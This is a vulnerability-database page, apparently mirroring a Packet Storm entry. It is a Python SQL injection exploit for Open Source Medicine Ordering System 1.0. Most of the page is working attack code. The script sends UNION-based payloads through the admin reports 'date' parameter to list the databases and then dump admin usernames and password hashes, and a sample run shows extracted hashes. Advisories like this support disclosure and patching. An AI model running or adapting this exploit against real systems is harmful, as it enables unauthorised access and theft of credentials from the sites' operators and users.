Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOnur KarasalihogluPACKETSTORM:177985
HistoryApr 08, 2024 - 12:00 a.m.

Open Source Medicine Ordering System 1.0 SQL Injection

2024-04-0800:00:00
Onur Karasalihoglu
packetstormsecurity.com
89
sql injection
admin users data
python script

AI Score

7.4

Confidence

Low

JSON
`# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi  
# Author : Onur KarasalihoฤŸlu  
# Date : 27/02/2024  
# Sample Usage  
  
% python3 omos_sqli_exploit.py https://target.com  
Available Databases:  
1. information_schema  
2. omosdb  
Please select a database to use (enter number): 2  
You selected: omosdb  
Extracted Admin Users Data:  
1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin  
2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith  
'''  
  
import requests  
import re  
import sys  
  
def fetch_database_names(domain):  
url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"  
  
try:  
# HTTP request  
response = requests.get(url)  
response.raise_for_status() # exception for 4xx and 5xx requests  
  
# data extraction  
pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')  
extracted_data = pattern.search(response.text)  
if extracted_data:  
databases = extracted_data.group(1).split(',')  
databases = [db.replace('"', '') for db in databases]  
print("Available Databases:")  
for i, db in enumerate(databases, start=1):  
print(f"{i}. {db}")  
  
# users should select omos database  
choice = int(input("Please select a database to use (enter number): "))  
if 0 < choice <= len(databases):  
selected_db = databases[choice - 1]  
print(f"You selected: {selected_db}")  
fetch_data(domain, selected_db)  
else:  
print("Invalid selection.")  
else:  
print("No data extracted.")  
except requests.RequestException as e:  
print(f"HTTP Request failed: {e}")  
  
def fetch_data(domain, database_name):  
url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"  
  
try:  
# HTTP request  
response = requests.get(url)  
response.raise_for_status() # exception for 4xx and 5xx requests  
  
# data extraction  
pattern = re.compile(r'enforsec\[(.*?)\]enforsec')  
extracted_data = pattern.search(response.text)  
if extracted_data:  
print("Extracted Admin Users Data:")  
data = extracted_data.group(1)  
rows = data.split('","')  
for row in rows:  
clean_row = row.replace('"', '')  
user_details = clean_row.split(',')  
print(" | ".join(user_details))  
else:  
print("No data extracted.")  
except requests.RequestException as e:  
print(f"HTTP Request failed: {e}")  
  
def main():  
if len(sys.argv) != 2:  
print("Usage: python3 omos_sqli_exploit.py <domain>")  
sys.exit(1)  
  
fetch_database_names(sys.argv[1])  
  
if __name__ == "__main__":  
main()  
  
`

AI Score

7.4

Confidence

Low

JSON